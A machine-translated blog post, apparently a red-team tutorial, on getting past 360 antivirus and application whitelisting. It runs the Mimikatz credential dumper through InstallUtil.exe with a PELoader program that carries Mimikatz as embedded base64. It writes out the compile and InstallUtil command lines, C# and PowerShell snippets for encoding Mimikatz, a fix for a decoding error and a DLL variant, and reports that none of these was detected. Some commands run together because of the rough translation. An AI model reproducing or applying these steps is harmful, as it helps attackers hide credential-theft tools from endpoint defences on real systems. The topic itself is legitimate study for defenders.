Use a whitelist to bypass 360 instances

Use a whitelist to bypass 360 instances

0x00 Preface

Recently, subTee introduced in his blog how to use the white list to bypass protection, but there are bugs in the details. Therefore, this article only describes how to fix the bug and use this method to bypass 360, more exploitation methods are worth exploring

0x01 test target

Download the latest Mimikatz version to bypass anti-virus software scanning and removal.

0x02 test environment

Operating System: Win7 x64

Mimikatz version: 2.0 alpha 20150906 (oe. eo) edition (latest so far)

Download link: https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20150906

Test Date:

0x03 actual test

We recommend that you first understand the reference link. The basic knowledge mentioned in the link will not be further introduced.

1. download the latest mimikatz and test the detection and removal status.

No doubt, being scanned and killed,

2. Use installutil.exe to execute the program

(1)Download https://gist.github.com/subtee/00cdac8990584bd2c2feand save it as peloader.cs

(2)Follow the example in the blog to execute the following code:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.csC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe

Generate peloader.exe, and then execute peloader.exe through installutil.exe.

Mimikatz loaded and running

The progress is installutil.exe,

(3)Test the generated peloader.exe killing status

, 360 successfully detected threats

(4)Try to modify PELoader. cs

Read the code and find that the Line853-856 stores base64 encrypted mimikatz

Then, refer to the modification method provided by the author for modification.

The modification method provided by the author is as follows:

* Base64 Encode Mimikatz In PowerShell-  $fileName = "mimikatz.exe" $fileContent = get-content $fileName $fileContentBytes = [System.Text.Encoding]::UTF8.GetBytes($fileContent) $fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes) $fileContentEncoded | set-content ($fileName + ".b64")  * [OR] byte[] AsBytes = File.ReadAllBytes(@"C:\Tools\Mimikatz.exe"); String AsBase64String = Convert.ToBase64String(AsBytes); StreamWriter sw = new StreamWriter(@"C:\Tools\Mimikatz.b64"); sw.Write(AsBase64String); sw.Close();  *

(5)Test Base64 Encode Mimikatz In PowerShell

Mimikatz is base64-encoded according to the method provided by the author and stored in the Mimikatz. b64 file.

Execute Powershell code

Generate Mimikatz. b64 after execution,

Open the definition of the variable KatzCompressed copied to PELoader. cs,

Perform the test according to step (2) and find the error,

0x04 Analysis

If the instance Code provided by the author cannot be modified, the modification method must be found to execute any program.

0x05 Solution

After conducting multiple experiments and researching the code, I found the cause of the error:

A parsing error exists between Powershell base64 encoding and c # base64 decoding.

Solution:

(1)Use c # To perform base64 encryption on mimikatz

The Code is as follows:

using System;using System.IO;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;namespace test1{    class Program    {        static void Main(string[] args)        {            byte[] AsBytes = File.ReadAllBytes(@"C:\testcs\mimikatz.exe");            String AsBase64String = Convert.ToBase64String(AsBytes);            StreamWriter sw = new StreamWriter(@"C:\testcs\mimikatz.b64");            sw.Write(AsBase64String);            sw.Close();        }    }}

My environment is vs2012, create a c # project, fill in the above Code, compile and run it, and generate a new mimikatz. b64,

Careful students can find that they are different from mimikatz. b64 generated by Powershell.

(2)Replace the definition of KatzCompressed.

(3)Modify decryption process

Locate PELoader. cs Line106 and remove

byte[] decompressed = Decompress(FromBase64);

Add "//" to the front,

(4)Re-compile and use installutil.exe for execution

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.csC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe

Verify that the modification is successful and the modified Code can be successfully executed.

(5)Enhanced kill-free

Follow these steps:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /target:library /out:PELoader.dll PELoader.csC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.dll

You can also load mimikatz

Test kill Detection

Note:360 is enabled throughout the test, and active defense is not triggered

0x06 Summary

By using installutil.exe to execute a program, you can not only bypass antivirus software detection and removal, but also avoid the restriction of the program running whitelist. The situations in other operating systems are different. More details are worth studying.